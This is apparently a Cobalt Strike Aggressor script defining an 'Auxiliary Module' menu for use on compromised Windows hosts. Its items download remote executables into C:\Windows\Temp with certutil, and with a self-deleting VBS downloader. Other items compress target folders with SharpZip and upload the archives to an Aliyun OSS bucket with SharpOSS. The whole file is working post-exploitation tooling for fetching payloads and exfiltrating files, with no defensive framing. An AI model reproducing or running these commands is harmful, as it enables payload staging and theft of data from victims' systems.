menu "Auxiliary Module" {
  item "certutil download file" {
    $bid = $1['@'];
    $dialog = dialog("certutil远程下载", %(url => "http://xxxx", path => "C:\\Windows\\Temp\\helper.exe", bid => $bid), &certutil);
    dialog_description($dialog, "certutil command remote file download.");
    drow_text($dialog, "url", "remote file address: ");
    drow_text($dialog, "path", "Local file storage: ");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
  }
  sub certutil {
    $url = $3 ['url'];
    $path = $3['path'];
    bshell($bid, "certutil.exe -urlcache -split -f $url $path");
  }

  item "vbs download file" {
    $bid = $1['@'];
    $dialog = dialog("vbs下载文件", %(url => "http://xxxx", path => "C:\\Windows\\Temp\\helper.exe", bid => $bid), &vbs);
    dialog_description($dialog, "vbs script downloads files remotely, command line transfer parameters, the vbs download script is automatically cleared after execution.");
    drow_text($dialog, "url", "remote file address: ");
    drow_text($dialog, "path", "Local file storage: ");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
  }
  sub vbs {
    $url = $3 ['url'];
    $path = $3['path'];
    bupload($bid, script_resource("/scripts/Auxiliary/download.vbs"));
    bshell($bid, "download.vbs $url $path");
    bshell($bid, "del /f /s /q download.vbs");
  }

  item "SharpZip (compressed folder)" {
    $bid = $1['@'];
    $dialog = dialog("SharpZip compressed and packaged file", %(file => "C:\\Windows\\Temp", path => "C:\\Windows\\Temp.zip", bid => $bid) , &SharpZip);
    drow_text($dialog, "file", "file:  ");
    drow_text($dialog, "path", "path:  ");
    dialog_description($dialog, "Compress and package directories or files. Project address: https://github.com/uknowsec/SharpZip");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
  }
  sub SharpZip {
    $arg = join('', @("$3['file'] $3['path']"));
    bexecute_assembly($bid, script_resource("/scripts/Auxiliary/SharpZip.exe"), $arg);
  }

  item "SharpOSS (upload file)" {
    $bid = $1['@'];
    $dialog = dialog("SharpOSS", %(bucketName => "", accessKeyId => "", accessKeySecret => "", endpoint => "oss-cn-chengdu.aliyuncs.com", UploadFilePath => "C:\\Windows\\Temp\\bak.zip", bid => $bid), &SharpOSS);
    dialog_description($dialog, "Quickly upload target system files to Aliyun OSS through aliyun-oss-csharp-sdk. Project address: https://github.com/uknowsec/SharpOSS");
    drow_text($dialog, "bucketName", "BucketName: ");
    drow_text($dialog, "accessKeyId", "AccessKeyId: ");
    drow_text($dialog, "accessKeySecret", "AccessKeySecret: ");
    drow_text($dialog, "endpoint", "Endpoint: ");
    drow_text($dialog, "UploadFilePath", "UploadFilePath: ");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
  }
  sub SharpOSS {
    $bucketName = $3['bucketName'];
    $accessKeyId = $3['accessKeyId'];
    $accessKeySecret = $3['accessKeySecret'];
    $endpoint = $3['endpoint'];
    $UploadFilePath = $3['UploadFilePath'];
    $arg = join(' ', @($3['bucketName'],$3['accessKeyId'],$3['accessKeySecret'],$3['endpoint'],$3['UploadFilePath']));
    bexecute_assembly($bid, script_resource("/scripts/Auxiliary/SharpOSS.exe"), $arg);
  }

}